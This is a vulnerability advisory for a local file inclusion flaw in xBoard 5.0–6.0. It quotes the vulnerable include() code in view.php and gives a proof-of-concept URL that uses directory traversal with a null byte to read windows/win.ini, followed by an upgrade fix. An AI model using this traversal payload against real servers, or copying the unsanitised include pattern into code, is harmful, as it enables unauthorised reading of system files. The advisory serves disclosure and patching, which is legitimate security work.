xBoard 5.0 / 5.5 / 6.0 Local File Inclusion

2013.12.26
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

?X-------------------------------------------------------------X _____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________ |_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \ | | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ / | | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| / | | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \ \_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_| X-------------------------------------------------------------X [+] Author: TUNISIAN CYBER [+] Exploit Title: xBoard 5.0/5.5/6.0 Local File Inclusion [+] Date: 24-12-2013 [+] Category: WebApp [+] Vendor:http://sourceforge.net/projects/xboard/ [+] Google Dork: [+] Tested on: Win7 , ubuntu 13.04 ######################################################################################## I/Vulnerable code: view.php v5.0: 49: if (file_exists("$directory/$post.html")) 50: { 51: include("$directory/$post.html"); v5.5: 28: if (file_exists("$directory/$post.html")) 29: { 30: include("$directory/$post.html"); v6.0: 27: if (file_exists("$directory/$post.html")) 28: { 29: include("$directory/$post.html"); II/Exploit and p.0.c: http://{host}/xboard/view.php?post=../../../../../../../../../../windows/win.ini%00 p.0.c: http://oi44.tinypic.com/2uxyaz9.jpg III/Solution: Upgrade to v6.5 ./3nD ######################################################################################## Greets to: XMaXtn, N43il HacK3r, XtechSEt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top